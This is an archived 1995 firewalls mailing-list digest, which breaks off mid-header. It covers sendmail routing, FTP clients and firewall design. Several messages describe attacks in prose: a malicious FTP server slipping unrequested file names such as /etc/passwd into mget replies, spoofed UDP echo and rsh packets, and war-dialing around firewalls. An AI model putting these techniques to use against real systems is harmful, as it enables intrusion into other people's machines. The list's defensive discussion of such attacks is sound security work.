Precedence: bulk Hi, I'am looking for a free SLIP package or a free PPP Package for SunOS 4.1.3, eventually Solaris 2.x, running on sparc2 and sparc10 architecture. Does somebody knows where can I ftp such a package ? Thanks, bye ct@gis.icdc.fr Christian TOURNAIRE From firewalls-owner Wed May 17 05:31:49 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA14622 for firewalls-outgoing; Wed, 17 May 1995 05:19:35 -0700 Received: from alcapone.cnes.fr (alcapone.cnes.fr [132.149.22.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA14614 for ; Wed, 17 May 1995 05:19:30 -0700 Received: from paclas01.siege.cnes.fr (paclas01.siege.cnes.fr [132.149.253.197]) by alcapone.cnes.fr (8.6.12/RH-19950308.01) with ESMTP id OAA01242 for ; Wed, 17 May 1995 14:18:26 +0200 Received: from paocr05 (paocr05 [132.149.251.50]) by paclas01.siege.cnes.fr (8.6.9/MH-94081601) with SMTP id OAA01162 for ; Wed, 17 May 1995 14:21:21 +0200 Message-Id: <199505171221.OAA01162@paclas01.siege.cnes.fr> X-Sender: salome@paclas01.siege.cnes.fr Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 17 May 1995 14:20:22 +0200 To: firewalls@GreatCircle.COM From: Eric.Salome@siege.cnes.fr (Eric Salomé) Subject: Re: Malicious Servers. Do clients guard against? (FTP example) X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Edward Maillet writes: >>Here's are the details of how I'd do it: >>The mget command for FTP issues (amoung other things) an NLST command which >>requests from the server a list of file names. An "mget *.ps" generates an >>NLST *.ps. The client then retrieves each of the files in the list. >>Would your FTP client notice if in the returned list of file names some >>names don't match the *.ps request? > > assuming this happens, how would this affect the end user? > i'm assuming that the ftp daemon ships over a bunch of *.ps > files and also something called "ls", in hopes that you > have the current dir as the first item in your path and that > you quit and type "ls"... > > for this to work you need to know the OS that you are sending > the files to. another problem is that files brought over wont > (for unix at least) be executable at first... > > am i missing your point? what other security aspects are there > to shipping over a file that wasnt requested? > >jeff First you have to learn never to get files from systems you don't "own" directly into standard directories. Always use a "/var/tmp" like directory to get files. Never be "root" or admin account when getting files. The risk seems real. I might setup a ftp server with a /pub/network/config directory where you see a bunch of "near ready to use files" named.boot named.local resolv.conf and named... tools to config and start a DNS. Now I can bet people getting these files are most likely to do that from an Unix System. I can bet 80 % of them are "root" on their own machines. You might be cautious enought to get the files, being in your /var/tmp directory. But what happens if my ftp server generate, in response to your mget command, among many named.* file names, a "/etc/passwd" file name ? (I can even be more subtle than just rewriting your /etc/passd file). Would it work ? E. SALOME ____________________________________________________________________________ ________ Eric Salome - CERTIX Eric.Salome@siege.cnes.fr (ALTIOR Consultant at the CNES at this time) **** All opinions expressed are my own and not necessarily those of my employer **** From firewalls-owner Wed May 17 06:35:20 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA15488 for firewalls-outgoing; Wed, 17 May 1995 06:03:40 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA15483 for ; Wed, 17 May 1995 06:03:36 -0700 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA04611; Wed, 17 May 1995 09:03:13 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA05510; Wed, 17 May 1995 09:03:10 -0400 Message-Id: <9505171303.AA05510@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: Tim Keanini , firewalls@greatcircle.com Date: Wed, 17 May 1995 09:02:58 -0500 Subject: Re: PASV Mac or Windows Client Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.0-WB1) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 16 May 95 at 17:19, Tim Keanini was heard to utter: > > I am trying to locate a PASV ftp client for Mac and Windows. > I cant use Netscape or Mosaic because this if for uploading files. > I checked out the lastest Fetch and Anarchie and they both DO NOT do > PASV. For MS-Windows, check out WS_FTP. Note that there's also a 32-bit version. -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## If you like this sort of thing, ## ## this is the sort of thing you'll like. ## From firewalls-owner Wed May 17 06:56:11 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA15515 for firewalls-outgoing; Wed, 17 May 1995 06:04:09 -0700 Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA15509 for ; Wed, 17 May 1995 06:04:05 -0700 Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id IAA05973; Wed, 17 May 1995 08:58:47 -0400 Date: Wed, 17 May 1995 08:58:46 -0400 (EDT) From: David Miller Subject: Re: Malicious Servers. Do clients guard against? (FTP example) To: Jeff Murphy cc: Edward Maillet , firewalls@GreatCircle.COM In-Reply-To: <199505170250.WAA14440@smurfland.cit.buffalo.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 16 May 1995, Jeff Murphy wrote: > Edward Maillet writes: > >Here's are the details of how I'd do it: > >The mget command for FTP issues (amoung other things) an NLST command which > >requests from the server a list of file names. An "mget *.ps" generates an > >NLST *.ps. The client then retrieves each of the files in the list. > >Would your FTP client notice if in the returned list of file names some > >names don't match the *.ps request? > > assuming this happens, how would this affect the end user? > i'm assuming that the ftp daemon ships over a bunch of *.ps > files and also something called "ls", in hopes that you > have the current dir as the first item in your path and that > you quit and type "ls"... > > for this to work you need to know the OS that you are sending > the files to. another problem is that files brought over wont > (for unix at least) be executable at first... > > am i missing your point? what other security aspects are there > to shipping over a file that wasnt requested? How about \autoexec.bat, \config.sys, or overwriting existing files like ~/.profile that, combined with ./... does dastardly things? > > jeff > ---------------------------------------------------------------------------- It's *amazing* what one can accomplish when one doesn't know what one can't do! From firewalls-owner Wed May 17 07:11:57 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16048 for firewalls-outgoing; Wed, 17 May 1995 06:47:37 -0700 Received: from vdoehp.vak12ed.edu (vdoehp.vak12ed.edu [141.104.22.101]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA16043 for ; Wed, 17 May 1995 06:47:33 -0700 Message-Id: <199505171347.GAA16043@miles.greatcircle.com> Received: by vdoehp.vak12ed.edu (1.37.109.16/16.2) id AA164668369; Wed, 17 May 1995 09:46:09 -0400 From: "W.C. Epperson" Subject: Re: Monitoring outgoing traffic To: smith@sctc.com (Rick Smith) Date: Wed, 17 May 95 9:46:08 EDT Cc: firewalls@greatcircle.com In-Reply-To: <199505161549.KAA24388@shade.sctc.com>; from "Rick Smith" at May 16, 95 10:49 am Mailer: Elm [revision: 70.85] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I don't generally think of my pocket or briefcase as being a forum > for the "public release" of information. The Internet is. > > Besides, computers and people have different trust properties. > > How often do you stick a sensitive document in a briefcase or pocket > by accident? Rarely, I expect. But even if you did, you still had > *lots* of opportunities to discover the error and then protect the > document from compromise. (thanks, Beede) > Not long ago, I sat on an airliner next to someone who was reviewing a mortgage application and credit report, in full readable view of myself, the airline staff, and anyone on the way to the head.... But this part of the discussion probably belongs on "risks", not "firewalls". -- W.C. Epperson "I have great faith in fools. Senior SE Self-confidence, my friends call it." Virginia Dept. of Education --E.A. Poe-- epperson@vdoehp.vak12ed.edu From firewalls-owner Wed May 17 07:44:20 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA16281 for firewalls-outgoing; Wed, 17 May 1995 06:57:45 -0700 Received: from alexander.erg.sri.com (alexander.erg.sri.com [128.18.110.55]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA16276 for ; Wed, 17 May 1995 06:57:42 -0700 Received: from localhost.erg.sri.com by alexander.erg.sri.com (5.65/2.7davy) id AA29247; Wed, 17 May 95 06:57:50 -0700 Message-Id: <9505171357.AA29247@alexander.erg.sri.com> To: Eric.Salome@siege.cnes.fr (Eric Salomi) Cc: firewalls@greatcircle.com Subject: Re: Malicious Servers. Do clients guard against? (FTP example) In-Reply-To: Your message of Wed, 17 May 95 14:20:22 +0200. <199505171221.OAA01162@paclas01.siege.cnes.fr> Date: Wed, 17 May 95 06:57:48 -0700 From: Bryan McDonald Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We had a user here ftp a .forward file into his homedir and took him 3 days to realize it (long weekend).You could do all sorts of things to someone without really trying hard at all. Bryan From firewalls-owner Wed May 17 08:01:35 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA16802 for firewalls-outgoing; Wed, 17 May 1995 07:26:06 -0700 Received: from brimstone.soscorp.com (soscorp.soscorp.com [204.52.248.130]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA16797 for ; Wed, 17 May 1995 07:26:03 -0700 Received: from fearless.soscorp.com (fearless.soscorp.com [204.52.249.130]) by brimstone.soscorp.com ($Revision: 2.21 $/8.6.12/8.6.4.287) with BSMTP id BS0026779/KAA26782; Wed, 17 May 1995 10:25:45 -0400 Received: (ari@localhost) by fearless.soscorp.com (8.6.10/8.6.4.287) id KAA25192; Wed, 17 May 1995 10:25:01 -0400 Date: Wed, 17 May 1995 10:25:01 -0400 From: ari@soscorp.com (Ari Shamash) Message-Id: <199505171425.KAA25192@fearless.soscorp.com> To: steveg@cseic.saic.com (Stephen Harold Goldstein) Cc: firewalls@GreatCircle.COM Subject: Firewall Web Page In-Reply-To: <9505151429.AA22128@cseic.saic.com> References: <9505151429.AA22128@cseic.saic.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>>> On Mon, 15 May 95 10:29:28 EDT, steveg@cseic.saic.com (Stephen Harold Goldstein) said: Stephen> Could someone please send me the *current* URL for Stephen> the "Firewall Products" Web page maintained by a kind Stephen> reader of this list? The list is at: http://www.access.digex.net/~bdboyle/firewall.vendor.html And there is a backup copy at: http://www.waterw.com/~manowar/vendor.html Ari From firewalls-owner Wed May 17 08:31:47 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA18478 for firewalls-outgoing; Wed, 17 May 1995 08:20:12 -0700 Received: from Sumtoi.UH.EDU (Sumtoi.UH.EDU [129.7.1.19]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA18473 for ; Wed, 17 May 1995 08:20:08 -0700 Received: from Jetson.UH.EDU by Jetson.UH.EDU (PMDF V4.3-10 #8380) id <01HQLTY3T7SG8Y5NBY@Jetson.UH.EDU>; Wed, 17 May 1995 10:19:49 -0500 (CDT) Date: Wed, 17 May 1995 10:19:49 -0500 (CDT) From: JAY LYALL Subject: VM Office Vision behind a firewall To: firewalls@greatcircle.com Message-id: <01HQLTY3UK0I8Y5NBY@Jetson.UH.EDU> X-VMS-To: IN%"firewalls@greatcircle.com" MIME-version: 1.0 Content-type: TEXT/PLAIN; CHARSET=US-ASCII Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've got a client running VM Office Vision behind a multi-homed firewall that uses sendmail. How do I tell OV to route mail destined outside the domain to be sent to the gateway? Any and all help is deeply appreciated. From firewalls-owner Wed May 17 09:01:52 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA18788 for firewalls-outgoing; Wed, 17 May 1995 08:32:27 -0700 Received: from maily1.prodigy.com (maily1.prodigy.com [192.207.105.55]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA18783 for ; Wed, 17 May 1995 08:32:24 -0700 Received: (from frank@localhost) by maily1.prodigy.com (8.6.10/8.6.9) id LAA29416; Wed, 17 May 1995 11:31:02 -0400 Date: Wed, 17 May 1995 11:31:01 -0400 (EDT) From: Frank Wortner To: Firewalls Subject: Re: Malicious Servers. Do clients guard against? (FTP example) In-Reply-To: <199505170438.AAA20261@cyber.zone.net> Message-ID: X-Mail-1: Prodigy Services Co. X-Mail-2: 1565 Front Street X-Mail-3: Yorktown Heights NY 10598 X-Phone: 1-914-448-1740 X-FAX: 1-914-448-1946 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 17 May 1995, Peter C. Norton wrote: > There's got to be something that makes this untenable, or it would > have happened a long time ago. I think. One possibility is that the UNIX FTP clients usually have "prompt" enabled. That requires the user to approve each file transfered by an "mget". Of course, it's also possible to disable "prompt" --- as is often done when the list of files to be transfered is large. Frank -- "Outside of a dog, a book is a man's best friend; inside of a dog, it's too dark to read." -- Groucho Marx From firewalls-owner Wed May 17 09:26:59 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA18287 for firewalls-outgoing; Wed, 17 May 1995 08:13:27 -0700 Received: from ns.ge.com (ns.ge.com [192.35.39.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA18282 for ; Wed, 17 May 1995 08:13:24 -0700 Received: from mak.is.ge.com ([3.19.100.81]) by ns.ge.com (8.6.12/8.6.11) with ESMTP id LAA05045 for ; Wed, 17 May 1995 11:13:04 -0400 Message-Id: <199505171513.LAA05045@ns.ge.com> Received: by mak.is.ge.com (1.37.109.9/15.6) id AA037874734; Wed, 17 May 1995 10:13:02 -0500 From: Mohamad A Khatoun Subject: Re: Sendmail Question To: firewalls@greatcircle.com Date: Wed, 17 May 95 10:13:02 CDT Mailer: Elm [revision: 70.85] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I have a question regarding sendmail configuration over a firewall. This > firewall is using smap to receive mail, and sendmail to send the outgoing > mail. > > The topology looks something like the following: > > Untrusted Trusted > > World ---- Firewall ----- Mailhost -- PostOffice1 > | > +---- PostOffice2 > | > +---- PostOffice3 > We want the following to happen: > All mail from the internal trusted hosts will arrive at the Firewall > with destination addresses and from addresses. We want all outgoing mail > to appear to be originating from user@domain.name (ie user@foo.com). This > will require the outgoing from header to be rewritten. > We want all incoming mail to the Firewall to parse through an aliases > file which may rewrite the outgoing email address. Also, all mail destined > for the internal network will be handed off to the internal Mailhost. The > Mailhost is not intelligent enough to rewrite headers, so we must rewrite > the headers with the firewall such that it identifies to which post office > the mail is destined. I realize this is not a normal function of a fw, however > this is going to have to be as such. > > --- > > Two things. Rewrite To headers based on an aliasees file, and rewrite > outgoing from addresses if they are NOT to a set of hosts. I can make the > outgoing headers be rewritten, however it will then change the destination > addresses within the domain to user@domain.name. I can make the sendmail > parse the aliases file and hand it off to the mailhost correctly, but then > mail that "replies" to sent mail from the internal hosts is destined for > user@PostOfficeX.domain.name, instead of user@domain.name. I could use MX > records to make PostOfficeX.domain.name have two destinations, firewall > and mailhost, with mailhost a higher priority, to "hop" it through, however > this is not preferred. > > I have struggled with this for some time, and have not been able to figure > out how to do it. > > Any help appreciated. I apologize if this is too narrow of a concern, though > I can see this configuration being of use in many firewall configurations. > -- > Alan Hannan alan@mid.net > Unless I misunderstand your question, I think that you have the answer but you have to organize your thoughts. While I am not an expert on sendmail, I have spoken with many who are. The solutions that is frequently recommended is as follows. Outbound Mail: 1) Setup the sendmail.cf file on each internal machine to send non-local mail to the firewall. 2) On the firewall configure sendmail with the "site hiding option" which changes the From: header to your desired domain name. Inbound Mail: 1) confiugre MX records on the firewall to forward incoming mail, destined for your domain, to your internal mail servers. For example, your MX record would be: yourdomain.com MX mailserver1 2) setup system alias files on your mail servers to forward users mail to the proper internal machines. Sendmail does not rewrite the From header; internal users can still reply to the mail. For example, if the user chuck wants to receive his mail on an internal machine calle babbage, the mail should contain an alias similar to the following: chuck@yourdmain.com chuck@babbage When external users reply to your users messages, the reply will come to the firewall which forwards it to the mail servers . The mail servers check the user name in the alias file and sends the mail to the proper host. Cheers, Mohamad From firewalls-owner Wed May 17 10:10:15 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA20487 for firewalls-outgoing; Wed, 17 May 1995 09:42:59 -0700 Received: from bosoleil.ci.umoncton.ca (bosoleil.ci.umoncton.ca [139.103.2.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA20482 for ; Wed, 17 May 1995 09:42:50 -0700 From: eav1001@Umoncton.CA Received: by bosoleil.ci.umoncton.ca (1.37.109.14/16.2) id AA162369017; Wed, 17 May 1995 13:43:37 -0300 Date: Wed, 17 May 1995 13:43:37 -0300 (ADT) Subject: Re: Requesting "echo" To: firewalls@greatcircle.com In-Reply-To: <199505170948.LAA05881@champagne.edelweb.fr> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 17 May 1995, Jean-Christophe Touvet wrote: > > Not blocking the echo port (port 7) or somehow preventing packets with > > spoofed IP addresses from entering the system could be even more > > disasterous to a site. Consider this scenario: > > > > A packet enters the network with a spoofed IP address (say of the > > backup server), with source port 514 (port for remote shell), and the > > payload consisting of a valid RSH-type "header" and content. This > > packet then gets echoed back to the backup server with the IP source > > address of the client. If the server trusts this host (and most > > backup hosts must, so remote dumps can happen), then what? > > Hmm, I'm not sure it would be such easy with TCP services. > > But there is at least one very annoying attack with UDP echo: send a spoofed > UDP packet with both source and destination port=7. Guess what ? > ^^^^^^^^^^ > -JCT- > what to guess ? would you, guys, give more explanations please ? Also, what is a spoofed UDP packet ? Thank you and hava gooday...! mustA_heart From firewalls-owner Wed May 17 10:35:51 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA21272 for firewalls-outgoing; Wed, 17 May 1995 10:06:10 -0700 Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA21267 for ; Wed, 17 May 1995 10:06:07 -0700 Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id NAA20340; Wed, 17 May 1995 13:00:49 -0400 Date: Wed, 17 May 1995 13:00:49 -0400 (EDT) From: David Miller Subject: Re: VM Office Vision behind a firewall To: JAY LYALL cc: firewalls@greatcircle.com In-Reply-To: <01HQLTY3UK0I8Y5NBY@Jetson.UH.EDU> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 17 May 1995, JAY LYALL wrote: > > I've got a client running VM Office Vision behind a multi-homed firewall that > uses sendmail. How do I tell OV to route mail destined outside the domain to > be sent to the gateway? > > Any and all help is deeply appreciated. Get an smtp gateway for OV. OV is neither sendmail nor SMTP, getting a firewall running sendmail to pass it just isn't going to happen:( --- David ---------------------------------------------------------------------------- It's *amazing* what one can accomplish when one doesn't know what one can't do! From firewalls-owner Wed May 17 10:56:52 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA21379 for firewalls-outgoing; Wed, 17 May 1995 10:13:57 -0700 Received: from styx.sif.state.ny.us (styx.sif.state.ny.us [168.141.118.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA21373 for ; Wed, 17 May 1995 10:13:51 -0700 Received: (uucp@localhost) by styx.sif.state.ny.us (8.6.12/8.6.9) id NAA18695 for ; Wed, 17 May 1995 13:12:21 -0400 Received: from zeus.sif.state.ny.us(168.141.100.10) by styx via smap (V1.0mjr) id smaa18675; Wed May 17 13:11:44 1995 Received: from dssvr1.sif.state.ny.us (dssvr1.sif.state.ny.us [168.141.107.13]) by zeus (8.6.9/8.6.5) with ESMTP id NAA08215 for ; Wed, 17 May 1995 13:06:26 -0400 Received: from DS_SVR1/MERCURY_Q by dssvr1.sif.state.ny.us (Mercury 1.21); 17 May 95 13:10:58 +1100 Received: from MERCURY_Q by DS_SVR1 (Mercury 1.21); 17 May 95 13:10:23 +1100 From: "ANNA M. KING" Organization: New York State Insurance Fund To: firewalls@GreatCircle.com Date: Wed, 17 May 1995 13:10:13 EST Subject: Packet filtering for NT firewall Priority: normal X-mailer: Pegasus Mail/Windows (v1.22) Message-ID: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am setting up an NT firewall to direct traffic from some other network, the firewall will be connected to a CISCO router with multiple serial ports connected to multiple networks of various types, to a particular machine ( mainframe or application server). What I need is packet filtering software. Any suggestions about what is best would be appreciated. Thanks Anna King Sr. Programmer/Analyst NY State Insurance Fund From firewalls-owner Wed May 17 11:17:21 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA22626 for firewalls-outgoing; Wed, 17 May 1995 10:59:00 -0700 Received: from csc.com (explorer.csc.com [20.1.10.27]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA22616 for ; Wed, 17 May 1995 10:58:55 -0700 Received: by csc.com (Smail3.1.29.1 #1) id m0sBnMl-000iCwC; Wed, 17 May 95 13:58 EDT Date: Wed, 17 May 1995 13:58:38 -0400 (EDT) From: Adam Safier To: Dave Roberts cc: firewalls@greatcircle.com Subject: Re: 1, Bastion host configuration In-Reply-To: <3007@saa-cons.co.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Internal +--------+ +--------------+ +--------+ Internet > ----+ Router +------+ Gateway +-----+ Router +---- > Network +--------+ +--------------+ +--------+ > This looks like THE CLASSIC Firewall config, esp. if you have multiple subnets on the protected side. Consider NSC router for the public link and check out Cisco's 10.4 upcoming software release. Adam From firewalls-owner Wed May 17 11:35:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA23212 for firewalls-outgoing; Wed, 17 May 1995 11:19:29 -0700 Received: from death.netsys.com (death.netsys.com [204.160.179.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA23206 for ; Wed, 17 May 1995 11:19:25 -0700 Received: (from len@localhost) by death.netsys.com (8.6.10/HQ-Len) id LAA00807; Wed, 17 May 1995 11:18:37 -0700 From: len@NETSYS.COM (Len Rose) Message-Id: <9505171118.ZM805@death.netsys.com> Date: Wed, 17 May 1995 11:18:36 -0700 In-Reply-To: Christopher Davis "Re: ACE SecureID Flaw (SunOS 4.1.x)" (May 17, 2:10pm) References: <9505170303.ZM272@death.netsys.com> <199505171810.OAA07598@loiosh.kei.com> X-Phone: 415-528-7205 X-Mailer: Z-Mail (2.1.5 20sep93) To: Christopher Davis , len@NETSYS.COM (Len Rose) Subject: Re: ACE SecureID Flaw (SunOS 4.1.x) Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk True.. I located the stuff in Paul's distribution, but it infuriates me that ACE isn't more internet cognizant. No one uses NIS externally, unless they are foolish. Thanks Chris.. Len On May 17, 2:10pm, Christopher Davis offered an excellent suggestion: [snipped] > > The shres/INSTALL instructions in BIND 4.9.3 (currently at BETA17) include > directions (and a script) for updating both BSD and SysV shared libraries. > > They should probably add a note about this in their documentation, though, > since (as I mentioned earlier) many people skip updating the SysV libs. > [snipped] >-- End of excerpt from Christopher Davis -- len@netsys.com http://www.netsys.com "at&t. ever spend time in jail for having a small c program? you will." xod From firewalls-owner Wed May 17 11:58:55 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA21757 for firewalls-outgoing; Wed, 17 May 1995 10:39:06 -0700 Received: from csc.com (explorer.csc.com [20.1.10.27]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA21750 for ; Wed, 17 May 1995 10:39:02 -0700 Received: by csc.com (Smail3.1.29.1 #1) id m0sBn3R-000iFQC; Wed, 17 May 95 13:38 EDT Date: Wed, 17 May 1995 13:38:41 -0400 (EDT) From: Adam Safier To: Rick Smith cc: firewalls@greatcircle.com, smith@sctc.com Subject: Re: Why control outbound traffic? In-Reply-To: <199505152149.QAA10500@shade.sctc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >1. No. There is not a security problem with allowing unrestricted outgoing > >traffic [from a technical perspective]. > > It all depends on what you mean by "unrestricted" and what you mean by > "a technical perspective." > > Further restrictions reduce the organization's window of vulnerability > to more sophisticated technical attacks, as Andrew Molitor pointed > out. In theory users could run X-Terminal protocol through the firewall. Since their workstation is the "Server" the outside "Client" could request keystrokes, function key presses etc. I've done it in house with "dumb" terminals and termial emulator scripts (before I knew there was somthing more than hays modems). I don't see why that attack would not work with X-Terms. I suggest cutting off outgoing X-Term traffic. Do any sites actually allow outsiders to run custom X-Windows applications? 2c worth. Adam From firewalls-owner Wed May 17 12:15:38 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA23037 for firewalls-outgoing; Wed, 17 May 1995 11:11:01 -0700 Received: from loiosh.kei.com (loiosh.kei.com [192.88.144.32]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA23031 for ; Wed, 17 May 1995 11:10:58 -0700 Received: (from ckd@localhost) by loiosh.kei.com (8.6.10/8.6.9) id OAA07598; Wed, 17 May 1995 14:10:39 -0400 Date: Wed, 17 May 1995 14:10:39 -0400 From: Christopher Davis Message-Id: <199505171810.OAA07598@loiosh.kei.com> To: len@NETSYS.COM (Len Rose) CC: firewalls@greatcircle.com Subject: Re: ACE SecureID Flaw (SunOS 4.1.x) Newsgroups: kei.mail.firewalls In-Reply-To: <9505170303.ZM272@death.netsys.com> References: <9505170303.ZM272@death.netsys.com> X-Attribution: ckd Sender: firewalls-owner@GreatCircle.COM Precedence: bulk LR> == Len Rose LR> Has anyone noted that ACE has linked their code against LR> /usr/5lib/libc.so.2.9, which unfortunately has the braindead resolver LR> (NIS/hosts)? [...] LR> They need to get with the program and link against the real resolver LR> routines in libc.so.1.9.x that use BIND (or at least offer 2 versions LR> of the binaries) Um, no. Out of the box on SunOS 4.1.x, both /usr/lib/libc.so.1.x (the BSD shared libraries) and /usr/5lib/libc.so.2.x (the SysV shared libraries) use NIS (if running) or /etc/hosts (if not). Given your description it sounds like you've replaced the gethostby* routines in the BSD shared libraries, but not in the SysV shared libraries. This is commonly done simply because not much (other than vi, and when does *that* resolve hostnames?) uses the SysV shared libraries. The shres/INSTALL instructions in BIND 4.9.3 (currently at BETA17) include directions (and a script) for updating both BSD and SysV shared libraries. They should probably add a note about this in their documentation, though, since (as I mentioned earlier) many people skip updating the SysV libs. -- Christopher Davis * * 512/03829F89 = D7 C9 A7 80 8C 84 3F B2 27 E1 48 61 BF FC 18 B4 1024/66CB73DD = 46 8E FD F5 12 8E 13 4C 2C 8A 92 A3 B0 D5 2A 5E [ Public keys available by finger, WWW, or keyserver ] From firewalls-owner Wed May 17 12:51:25 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA22212 for firewalls-outgoing; Wed, 17 May 1995 10:50:32 -0700 Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA22207 for ; Wed, 17 May 1995 10:50:29 -0700 Received: from maestro.Maestro.COM by relay2.UU.NET with SMTP id QQyqdj10185; Wed, 17 May 1995 13:50:09 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA28062; Wed, 17 May 95 13:45:07 EDT Date: Wed, 17 May 1995 13:45:06 -0400 (EDT) From: Sick Puppy Subject: Re: Malicious Servers. Do clients guard against? To: maillet@usmcs.maine.edu Cc: Firewalls@GreatCircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There are a couple of sites on the Internet running web servers which been modified to assist their owners by facilitating the free exchange of information. I noticed that when I connect to one of these, while I am reading web pages the server is trying to establish connections back to me and use other services than www. On two occasions when I traced exactly what the web server was doing, it was trying to find various files in my system and to get my system to mail the files back to it. I tried going out through at TIS machine to these servers, and the TIS machine spat out all kinds of alerts while it blocked the attempted connections. Mentioned this to mjr at SANS 95 and he seemed to think that I was mistaken about what the web servers were trying to do. With all due respect to the significant expertize of mjr, the bottom line is that a TIS machine does look for attacks against the client (actually against the TIS proxy agent), whether it was designed to or not. Generally I try to go around firewalls rather than go through them, so can't comment on the other popular firewalls. Most shops with good firewalls have completely unrestricted dialups on older systems that they forgot about. Ah, the blessings of ToneLoc. Gobbler is like cheating though, makes it just too easy. Le Sick Puppy ze Cat_Eating_Dawg Blaque Elicopter Pilot Secret Internacional Armee targeting the Michigan Militia From firewalls-owner Wed May 17 13:19:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA24574 for firewalls-outgoing; Wed, 17 May 1995 12:10:07 -0700 Received: from styx.sif.state.ny.us (styx.sif.state.ny.us [168.141.118.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA24569 for ; Wed, 17 May 1995 12:10:02 -0700 Received: (uucp@localhost) by styx.sif.state.ny.us (8.6.12/8.6.9) id PAA21473 for ; Wed, 17 May 1995 15:08:35 -0400 Received: from zeus.sif.state.ny.us(168.141.100.10) by styx via smap (V1.0mjr) id smaa21424; Wed May 17 15:07:28 1995 Received: from dssvr1.sif.state.ny.us (dssvr1.sif.state.ny.us [168.141.107.13]) by 